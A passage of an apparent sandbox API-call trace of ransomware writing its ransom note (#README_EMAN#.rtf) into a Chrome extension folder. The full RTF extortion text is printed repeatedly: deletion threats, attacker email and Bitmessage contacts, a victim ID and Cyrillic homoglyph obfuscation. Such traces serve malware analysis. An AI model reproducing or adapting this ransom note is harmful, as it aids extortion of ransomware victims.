\\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.208] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ee8a78, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0289.208] WriteFile (in: hFile=0x2d4, lpBuffer=0x1ee8a78*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ee8a78*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.209] CloseHandle (hObject=0x2d4) returned 1 [0289.209] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\#readme_eman#.rtf")) returned 0xffffffff [0289.209] GetLastError () returned 0x2 [0289.209] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0289.221] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 